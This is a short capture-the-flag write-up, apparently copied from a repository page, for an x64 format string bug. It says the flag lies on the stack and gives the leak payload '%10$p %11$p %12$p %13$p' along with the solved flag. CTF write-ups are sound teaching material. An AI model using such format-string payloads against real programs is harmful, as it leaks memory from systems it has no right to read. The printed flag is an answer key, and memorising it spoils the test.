- Format String Bug (x64)
- pwndbg
- IDA 7.0
-
Vulnerability
-
Exploit
- The content of flag is saved in stack. So, simply could print by FSB.
- Just print 4 times after offset 10.
"%10$p %11$p %12$p %13$p"
ex.py
-
pctf{pr1nTf_1z_4_St4R_m4p}
Name | Name | Last commit date | ||
---|---|---|---|---|
parent directory.. | ||||
Vulnerability
Exploit
"%10$p %11$p %12$p %13$p"
ex.py
pctf{pr1nTf_1z_4_St4R_m4p}